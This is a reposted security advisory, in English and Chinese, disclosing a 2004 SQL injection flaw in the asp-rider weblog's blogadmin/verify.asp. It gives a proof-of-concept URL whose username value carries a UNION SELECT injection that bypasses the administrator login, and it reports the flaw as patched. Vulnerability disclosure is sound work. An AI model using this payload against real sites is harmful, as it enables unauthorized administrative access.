[转载]asp-rider SQL Injection漏洞
信息来源:[url]www.karchack.com[/url]affected software decribtion :
asp-rider is a full farsi weblog written in asp
[url]www.asp-rider.com[/url]
--------------------------------------
Vulnerabilities:
the file verify.asp in blogadmin folder is vulnerable to sql injection attack
-------------------------------------
proof of concept :
you can easily log in to the weblog administrator page by entering :
[url]www.site.com/weblog/blogadmin/verify.asp?username=[/url]'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1
-------------------------------------
this vulnerability is already patched.
[url]www.karchack.com[/url]
[url]www.karchack.net[/url] 文章来源:
[url]http://marc.theaimsgroup.com/l=bugtraq&m=110305802005220&w=2[/url]
发布日期:
2004-12-14 21:00:20
受影响软件描述:
asp-rider是一个用asp写成的功能齐全的网络日志程序。
([url]www.asp-rider.com[/url])
漏洞描述:
blogadmin目录下的verify.asp存在sql注入漏洞。
漏洞测试:
你可以输入以下url
[url]www.site.com/weblog/blogadmin/verify.asp?username=[/url]'union select 1,1,1,1,1,1,1,1 from \tbl_users where ''='&password=1
来登陆管理界面.
解决办法:
漏洞已被修补
页:
[1]